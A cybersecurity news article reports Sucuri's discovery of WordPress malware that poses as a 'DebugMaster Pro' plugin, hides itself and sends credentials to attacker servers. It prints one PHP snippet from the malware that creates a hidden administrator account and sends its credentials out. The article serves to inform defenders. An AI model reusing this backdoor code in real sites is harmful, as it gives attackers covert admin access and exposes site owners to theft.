WordPress Websites Got Exploited by Hackers with Silent Malware to Gain Admin Access

“As you know, many websites are built on WordPress, and many of them can be affected by malware. A Recent case involves Silent Malware.”

It has been found that a sophisticated malware campaign targeting WordPress websites uses persistent backdoor mechanisms and sophisticated steganographic techniques to retain illegal administrator access.

 

Cybercriminals may construct enduring footholds on compromised websites while evading detection by conventional security measures thanks to the malware’s two major components, which cooperate to form a robust assault architecture.

 

Malicious files that pose as authentic WordPress components are first deployed as part of the assault.

 

To evade discovery, these files use several levels of obfuscation and encoding, generating administrator accounts with hardcoded credentials that allow attackers to continue accessing the system long after initial security breaches are identified.

 

By taking use of both plugin infrastructure and essential user management features, the malware’s architecture shows a deep comprehension of WordPress’ internal workings and creates persistent access points.

 

In addition to creating accounts, the virus uses sophisticated communication protocols with command-and-control servers to automatically send compromised passwords and system data to endpoints under the attacker’s control.

 

This makes it possible for threat actors to create vast networks of compromised WordPress installations by simultaneously harvesting administrative access credentials from several compromised sites.

 

During regular security cleanups, Sucuri analysts discovered the malware and noted its advanced persistence mechanisms, which actively thwart attempts to remove it.

 

The impact of the malware goes beyond only granting illegal access; it may also allow attackers to insert dangerous content, send users to phony websites, collect private data, or send out more malicious payloads.

 

For website owners, who might not be aware of the compromise for a long time while attackers continue to have silent access to their systems, this campaign is especially risky due to its combination of stealth methods and persistent mechanisms.

Superior Stealth and Persistence Mechanisms

The malware uses a dual-file strategy that guarantees redundant access channels, exhibiting remarkable intelligence in its persistence methods.

The main component poses as the “DebugMaster Pro” plugin, complete with believable metadata such as GitHub repositories, version numbers, and expert descriptions.

Beneath this exterior, though, is highly obfuscated code intended to generate administrator accounts and open channels of communication with outside servers.

 

public function create_admin_user() { if (get_option($this->init_flag, false)) return; $creds = $this->generate_credentials(); if (!username_exists($creds[“user”])) { $user_id = wp_create_user($creds[“user”], $creds[“pass”], $creds[“email”]); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role(“administrator”); } } $this->send_credentials($creds); update_option($this->init_flag, time() + 86400 * 30); }

 

To evade detection by automated security tools and manual examination, the malware employs a variety of evasion tactics.

 

It hides administrator user accounts from common user administration interfaces and actively deletes itself from WordPress plugin listings via filtered queries

 

 The code obfuscates its true operation with goto statements and excessive hexadecimal encoding, making static analysis much more difficult for security experts.

 

In order to prevent dangerous functionality from being exposed to authorized users, the malware also whitelists known administrative IP addresses and uses IP tracking techniques to detect administrator access patterns.

 

This selective visibility shows a comprehensive awareness of operational security principles usually associated with advanced persistent threat groups, ensuring that the malware continues to operate against regular users while remaining concealed from website owners.

About The Author

Suraj Koli is a content specialist in technical writing about cybersecurity & information security. He has written many amazing articles related to cybersecurity concepts, with the latest trends in cyber awareness and ethical hacking. Find out more about “Him.”

Read More:

Attack on the Cisco ASA Zero-Day Duo Causes CISA to Issue an Emergency Mitigation Directive

About Author